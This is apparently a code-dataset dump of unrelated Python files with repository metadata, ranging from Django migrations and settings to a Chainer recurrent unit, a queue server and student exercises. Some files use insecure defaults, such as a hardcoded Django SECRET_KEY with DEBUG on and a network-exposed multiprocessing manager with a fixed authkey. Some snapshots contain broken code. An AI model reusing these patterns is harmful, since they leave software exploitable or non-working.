name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
|
[
"[email protected]"
] | |
5d911f4022457d7e47942adf723047dc59cefa2f
|
4a5f3b26fca176a80ca8eca796bc646bb225b017
|
/attentive-reader-2/sgu.py
|
8ddc21a3a0732b54672764fcd0003dcc2dec4e7a
|
[] |
no_license
|
musyoku/NLP
|
9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e
|
9b040bb960b65fb2a1c330adafa6c52e3284a0c1
|
refs/heads/master
| 2021-01-21T04:53:57.029200 | 2016-07-10T17:08:03 | 2016-07-10T17:08:03 | 55,848,677 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,107 |
py
|
import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
return clip.clip(x * 0.2 + 0.5, 0.0, 1.0)
class SGU(link.Chain):
def __init__(self, in_size, out_size):
super(SGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = softplus.softplus(z_g * h)
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulSGU(SGU):
def __init__(self, in_size, out_size):
super(StatefulSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
xp = cuda.get_array_module(x)
zero = variable.Variable(xp.zeros_like(x.data))
z_out = softplus.softplus(zero)
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * z_out
else:
h_t = SGU.__call__(self, self.h, x)
self.h = h_t
return h_t
class DSGU(link.Chain):
def __init__(self, in_size, out_size):
super(DSGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_go=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = sigmoid.sigmoid(self.W_go(z_g * h))
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulDSGU(DSGU):
def __init__(self, in_size, out_size):
super(StatefulDSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulDSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulDSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * 0.5
else:
h_t = DSGU.__call__(self, self.h, x)
self.h = h_t
return h_t
|
[
"[email protected]"
] | |
2908f0e3db2a300277114b39d46d25d3ea5e1012
|
2d3976964d8923a1e91e31af702bd68fbf37d474
|
/runTask/server.py
|
1bd36c0754e0d042ad090870e35b568521b7c88d
|
[] |
no_license
|
barry800414/master_thesis
|
2f6900fb2964891849dadef9283ed6e7f11cc696
|
01a0cac30ab63fcf818f1f43959634094b624af5
|
refs/heads/master
| 2020-05-29T08:53:32.810702 | 2016-06-04T02:03:52 | 2016-06-04T02:03:52 | 38,382,667 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 609 |
py
|
#!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
port = 3333
if len(sys.argv) == 2:
port = int(sys.argv[1])
q = queue.Queue()
# a QueueManager hold a queue q, which automatically handle race condition
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue', callable = lambda: q)
m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
s = m.get_server()
print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
s.serve_forever()
|
[
"[email protected]"
] | |
f50f22f4257ef2bd4b135c4c4b543869c019f8b8
|
4eeb40dcc265caf4a2b84bc90a28d481930d6a8a
|
/cssproject/cssproject/wsgi.py
|
e87cec6d202682e65310c1cd76e7ac0245d43209
|
[] |
no_license
|
mprasu/Sample-Projects
|
eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d
|
7363baf630900ab2babb4af2afe77911d8a548b2
|
refs/heads/master
| 2020-04-16T06:43:16.345750 | 2019-01-12T07:07:34 | 2019-01-12T07:07:34 | 165,358,055 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
ddbeff68f2104fbd657620867d9acc172c5adecb
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0190_Reverse_Bits/__init__.py
|
13d13496fce71652ff8239e68ab130a72e9cc66e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558 | 2015-06-08T18:05:03 | 2015-06-08T18:05:03 | 27,431,664 | 2 | 1 | null | 2015-06-08T18:05:04 | 2014-12-02T12:31:58 |
Python
|
UTF-8
|
Python
| false | false | 656 |
py
|
ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
|
[
"[email protected]"
] | |
0da90c73bc71313602b59d4b1cce999930cd4017
|
637669abf38aa06d786458bcb552d0d5dc188302
|
/claripy/ast/__init__.py
|
2da826a5b43d467502f3d34eadb856d283ede3f4
|
[
"BSD-2-Clause"
] |
permissive
|
angr/claripy
|
c5603b52f829a9b29630ed6665ab7ec294cb8157
|
b35449fecd129dc46a0cabdd6499354e89b38a68
|
refs/heads/master
| 2023-09-05T18:48:19.736126 | 2023-09-05T17:17:45 | 2023-09-05T17:17:45 | 40,328,505 | 260 | 115 |
BSD-2-Clause
| 2023-09-11T22:09:06 | 2015-08-06T21:50:19 |
Python
|
UTF-8
|
Python
| false | false | 1,376 |
py
|
# pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING
# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
else:
Bits = lambda *args, **kwargs: None
BV = lambda *args, **kwargs: None
VS = lambda *args, **kwargs: None
FP = lambda *args, **kwargs: None
Bool = lambda *args, **kwargs: None
Int = lambda *args, **kwargs: None
Base = lambda *args, **kwargs: None
true = lambda *args, **kwargs: None
false = lambda *args, **kwargs: None
String = lambda *args, **kwargs: None
all_operations = None
def _import():
global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
|
[
"[email protected]"
] | |
5d8cfdb679b337f26330b1c109a88a1680180caf
|
d569476dd95496339c34b231621ff1f5dfd7fe49
|
/PyTest/SteamSender/tests/test_send_cards.py
|
996577a1586476bfeec33e7f74f1ba41cfd2b17e
|
[] |
no_license
|
monteua/Tests
|
10f21f9bae027ce1763c73e2ea7edaf436140eae
|
553e5f644466683046ea180422727ccb37967b98
|
refs/heads/master
| 2021-01-23T10:28:49.654273 | 2018-05-09T09:11:30 | 2018-05-09T09:11:30 | 93,061,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 494 |
py
|
from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
for login in accounts_list:
if login == 'monte_ua13':
password = ""
else:
password = ""
SteamHome(driver).open_browser()
SteamHome(driver).enter_credentials(login, password)
SteamHome(driver).pass_steam_guard()
SteamHome(driver).open_trade_url()
SteamHome(driver).log_off()
|
[
"[email protected]"
] | |
4770757cc653f027b500d6f75168f8318a702d86
|
7f2612e5132e1583e5ba9758f299a8f301f0dc70
|
/FB/5-longest-palindromic-substring.py
|
fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a
|
[] |
no_license
|
taeheechoi/coding-practice
|
380e263a26ed4de9e542c51e3baa54315127ae4f
|
9528b5e85b0ea2960c994ffea62b5be86481dc38
|
refs/heads/main
| 2022-07-09T11:22:18.619712 | 2022-06-28T14:55:51 | 2022-06-28T14:55:51 | 447,082,854 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 426 |
py
|
class Solution:
# Time O(N^2) Space O(1)
def longestPalindrome(self, s):
res = ''
for i in range(len(s)):
odd = self.is_pal(s, i, i)
even = self.is_pal(s, i, i+1)
res = max(odd, even, res, key=len)
return res
def is_pal(self, s, l, r):
while l >= 0 and r < len(s) and s[l] == s[r]:
l -= 1
r += 1
return s[l+1: r]
|
[
"[email protected]"
] | |
d3b5e095fa1dab8e9c98895fa11a48312d856b56
|
874f46f4510b321ec3110ac8d5d5e572175c5544
|
/Generator_Tests/TestFrec/scripts/generator.py
|
94df7463f40e16990b3f6614572ff87accc2eb5a
|
[] |
no_license
|
JordiEspinozaMendoza/Simulacion
|
bb271aee0908693ff0e36470dae98216096d9066
|
fac1cdf5010a34a853a8b13d93209bcbde616e64
|
refs/heads/main
| 2023-05-31T14:06:21.329271 | 2021-06-14T02:52:06 | 2021-06-14T02:52:06 | 367,148,203 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
import sys
import os
import pandas as pd
sys.setrecursionlimit(5000)
# X = Semilla
# a = Multiplicador
# c = Constante aditiva
# m = Modulo
def Operacion(X, a, c, m):
Resi = ((a*X)+c) % m
return Resi
def createDataFrame(data):
df = pd.DataFrame(data, columns=["n","Xn","Xn+1","Rn"])
cols = list(df.columns)
return df.to_string(), df, cols
def Recursivo(self, X0, a, c, m, conta,Detener, ArraySemilla, data):
try:
for Semilla in ArraySemilla:
if X0==Semilla:
Detener = True
if Detener==True or conta==325:
pass
else:
data["n"].append(conta+1)
data["Xn"].append(X0)
data["Xn+1"].append(Operacion(X0,a,c,m))
data["Rn"].append(Operacion(X0,a,c,m)/m)
conta = conta + 1
ArraySemilla.append(X0)
Recursivo(Operacion(X0,a,c,m),a,c,m,conta,Detener, ArraySemilla, data)
except Exception as e:
print(str(e))
|
[
"[email protected]"
] | |
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1
|
f5f7f8d12956e4bff6e1c5f6fab10b006690f195
|
/luffy/settings.py
|
fe7c34ae1af2839496be8ef590c0c49e0a16121b
|
[] |
no_license
|
chenrun666/luffy
|
1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846
|
59f6229e16978ab9c40ef948807c717c2cddaea9
|
refs/heads/master
| 2020-04-07T16:09:20.306754 | 2018-11-21T08:45:29 | 2018-11-21T08:45:29 | 158,517,404 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,582 |
py
|
"""
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
|
[
"[email protected]"
] | |
23fbea60c2bea452a414dcf5f255cd4eabdab38a
|
437e905d8c214dc25c559b1dc03eaf9f0c85326f
|
/is28/vyacheslavleva28/lab6/function.py
|
1522faa137dc1fcb8f84d4cc4b96a551fd47870d
|
[] |
no_license
|
AnatolyDomrachev/karantin
|
542ca22c275e39ef3491b1c0d9838e922423b5a9
|
0d9f60207e80305eb713fd43774e911fdbb9fbad
|
refs/heads/master
| 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
def vvod():
a = []
for i in range(10):
x = float(input())
a.append(x)
return a
def rachet(a):
res = True
for i in range(0,len(a)-1):
if a[i]> a[i+1]:
res = False
return res
def vyvod(data):
print(result)
data = vvod()
print(data)
result = rachet(data)
print(result)
vyvod(result)
print(vyvod)
|
[
"[email protected]"
] | |
06aae58ab947c90ed7bc942a02ffa420afd0287b
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py
|
711d740178ee303c6379e1c1ec389c67bd15cca7
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 |
BSD-2-Clause
| 2023-09-08T09:08:30 | 2018-12-04T17:02:51 |
Python
|
UTF-8
|
Python
| false | false | 4,335 |
py
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75
|
eb61d62ca1f6f0123e3771105f5dfbbd6115138d
|
/.history/23-08-21_20210912011408.py
|
d242edf35564cc66ff35c5dd66a540fa6f9fc0b8
|
[] |
no_license
|
Alopezm5/CORRECTO-2
|
e0f14bcc3a88c0e222d10e3261e68532008bc42e
|
223613f1fb04dce3fac9f82f243cb2f22fe100f3
|
refs/heads/main
| 2023-07-29T06:52:48.147424 | 2021-09-12T20:33:27 | 2021-09-12T20:33:27 | 388,995,308 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,944 |
py
|
class Empresa:
def __init__(self,nom="El mas barato",ruc="0999999999",tel="042971234",dir="Juan Montalvo"):
self.nombre=nom
self.ruc=ruc
self.telefono=tel
self.direccion=dir
def mostrarEmpresa(self):
print("Empresa: {:17}, RUC: {}".format(self.nombre,self.ruc))
class Cliente:
def __init__(self,nom,ced,tel):
self.nombre=nom
self.cedula=ced
self.telefono=tel
def mostrarCliente(self):
print(self.nombre,self.cedula,self.telefono)
class ClienteCorporativo(Cliente):
def __init__(self,nomb,cedu,telecontrato):
super().__init__(nomb,cedu,tele,contrato)
self.__contrato=contrato
@property
def contrato(self): #getter: obtener el valor del atributo privado
return self.__contrato
@contrato.setter
def contrato(self,value): #setter: asigna el valor del atributo privado
if value:
self.__contrato=value
else:
self.__contrato="Sin contrato"
def mostrarCliente(self):
print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
def __init__(self,nom,ced,tel,promocion=True):
super().__init__(nom,ced,tel,)
self.__promocion=promocion
@property
def promocion(self): #getter: obtener el valor del atributo privado
return self.__promocion
def mostrarCliente(self):
print(self.nombre, self.__promocion)
class Articulo:
secuencia=0
iva=0.12
def __init__(self,des,pre,sto):
Articulo.secuencia+=1
self.codigo=Articulo.secuencia
self.descripcion= des
self.precio=pre
self.stock=sto
def mostraArticulo(self):
print(self.codigo,self.nombre)
class DetVenta:
linea=0
def __init__(self,articulo,cantidad):
DetVenta.linea+=1
self.lineaDetalle=DetVenta.linea
self.articulo=articulo
self.precio=articulo.precio
self.cantidad=cantidad
class CabVenta:
def __init__(self,fac,empresa,fecha,cliente,tot=0):
self.empresa=empresa
self.factura=fac
self.fecha=fecha
self.cliente=cliente
self.total=tot
self.detalleVen=[]
def agregarDetalle(self,articulo,cantidad):
detalle=DetVenta(articulo,cantidad)
self.total+=detalle.precio*detalle.cantidad
self.detalleVen.append(detalle)
def mostrarVenta(self,empNombre,empRuc):
print("Empresa {:17} r")
# emp=Empresa("El mas barato","0953156049","0998132446","Coop. Juan Montalvo")
# emp.mostrarEmpresa()
# print(emp.nombre)
cli1=ClientePersonal("Jose","0912231499","042567890",True)
cli1.mostrarCliente
art1=Articulo("Aceite",2,100)
art1.mostraArticulo()
art2=Articulo("Coca Cola",1,200)
art2.mostraArticulo()
art3=Articulo("Leche",1.5,200)
art3.mostraArticulo()
print(Articulo.iva())
|
[
"[email protected]"
] | |
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d
|
ac350894488b34318c11a65d35a0f8fdf69b7d50
|
/products/migrations/0001_initial.py
|
545343aa9abd1f1393c114e71c6c8e1aed73463f
|
[] |
no_license
|
phrac/onemgin
|
508f052304ddbc03f45e994ebe33769ae30d9336
|
7a029dbca1bd2725ceabc0741c7cfb47290aadb7
|
refs/heads/master
| 2021-01-16T19:31:10.929508 | 2015-09-08T23:53:43 | 2015-09-08T23:53:43 | 12,391,387 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,083 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Barcode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
],
),
migrations.CreateModel(
name='BarcodeType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('onemg', models.CharField(unique=True, max_length=13)),
('ean', models.CharField(unique=True, max_length=13)),
('upc', models.CharField(unique=True, max_length=12)),
('jan', models.CharField(max_length=13, null=True)),
('gtin', models.CharField(max_length=14, null=True)),
('nsn', models.CharField(max_length=14, null=True)),
('isbn10', models.CharField(max_length=10, null=True)),
('isbn13', models.CharField(max_length=13, null=True)),
('asin', models.CharField(max_length=10, null=True)),
('brand', models.CharField(max_length=128, null=True)),
('manufacturer', models.CharField(max_length=128, null=True)),
('mpn', models.CharField(max_length=64, null=True)),
('part_number', models.CharField(max_length=64, null=True)),
('sku', models.CharField(max_length=64, null=True)),
('model_number', models.CharField(max_length=64, null=True)),
('length', models.FloatField(null=True)),
('width', models.FloatField(null=True)),
('height', models.FloatField(null=True)),
('weight', models.FloatField(null=True)),
('description', models.CharField(max_length=512, null=True)),
('image_url', models.CharField(max_length=512, null=True)),
('amazon_url', models.URLField(null=True)),
('created', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.AddField(
model_name='barcode',
name='product',
field=models.ForeignKey(to='products.Product'),
),
migrations.AddField(
model_name='barcode',
name='type',
field=models.ForeignKey(to='products.BarcodeType'),
),
migrations.AlterUniqueTogether(
name='barcode',
unique_together=set([('product', 'type')]),
),
]
|
[
"[email protected]"
] | |
ddc87bfca79fabe3d914696f58497118d2d0d193
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/test/test_com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.py
|
d51b3347b77c7b18680b18281fcd2bb012c5ead3
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 |
Apache-2.0
| 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null |
UTF-8
|
Python
| false | false | 1,359 |
py
|
# coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info import ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(unittest.TestCase):
"""ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(self):
"""Test ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ee4b23bbf32042a37a0d791f5b2ca1db58e8570e
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2741/60666/264322.py
|
a8362f4be09e9d763b52af7aceca5c10738a7630
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 257 |
py
|
nums=eval(input())
if len(nums)<2:
print(nums)
else:
count=1
temp=1
for i in range(len(nums)-1):
if nums[i]<nums[i+1]:
count+=1
else:
temp=max(count,temp)
count=1
print(max(count,temp))
|
[
"[email protected]"
] | |
17e6f75ed18e0677f37465f1e06fd694ac1f207c
|
7790e3a3f2de068fef343585ec856983591997a2
|
/employee/templatetags/custom_math.py
|
f84010231a266d25ecf80f4bd85b0e1e5c8705ff
|
[] |
no_license
|
mehdi1361/tadbir
|
ce702a9a02672826f0bf06e8d5cf0644efe31949
|
c0a67710099f713cf96930e25df708625de89a6f
|
refs/heads/master
| 2021-06-04T07:35:37.624372 | 2018-07-23T05:25:04 | 2018-07-23T05:25:04 | 148,870,028 | 0 | 0 | null | 2019-10-22T21:40:28 | 2018-09-15T04:40:26 |
HTML
|
UTF-8
|
Python
| false | false | 484 |
py
|
from django import template
from django.db.models import Sum
from bank.models import File
register = template.Library()
@register.simple_tag
def add(a, b):
return a + b
@register.simple_tag
def count_files(user):
files = File.objects.filter(employees__employee=user)
return files.count()
